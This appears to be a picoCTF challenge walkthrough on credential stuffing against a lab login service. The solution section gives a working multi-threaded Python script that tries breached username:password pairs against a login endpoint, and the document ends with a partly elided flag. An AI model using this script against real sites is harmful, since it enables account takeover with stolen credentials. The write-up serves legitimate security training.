Description
Credential stuffing is the automated injection of stolen username and password pairs into website login forms, in order to fraudulently gain access to user accounts. Download the credentials dump creds-dump.txt .
Download creds-dump.txt -- it contains username:password pairs from a data breach.
Launch the challenge instance and note the login endpoint.
wc -l creds-dump.txt
head creds-dump.txt
Solution
- Step 1Inspect the credentials dumpThe file contains lines in the format username:password. One of these pairs is valid for the challenge's login service.cat creds-dump.txt | head -20
- Step 2Automate credential stuffingWrite a multi-threaded script to try each credential pair against the login endpoint until one succeeds.python3 << 'EOF' import requests from concurrent.futures import ThreadPoolExecutor URL = "http://HOST:PORT/login" creds = [line.strip().split(":", 1) for line in open("creds-dump.txt") if ":" in line] def try_cred(pair): username, password = pair r = requests.post(URL, data={"username": username, "password": password}, timeout=5) if "picoCTF" in r.text or "Welcome" in r.text: print(f"Valid: {username}:{password}") print(r.text) return True return False with ThreadPoolExecutor(max_workers=20) as ex: for result in ex.map(try_cred, creds): if result: break EOF
Flag
picoCTF{cr3d_stuf_succ3ss_...}
One credential pair in the dump is valid for the service -- multi-threaded stuffing finds it quickly.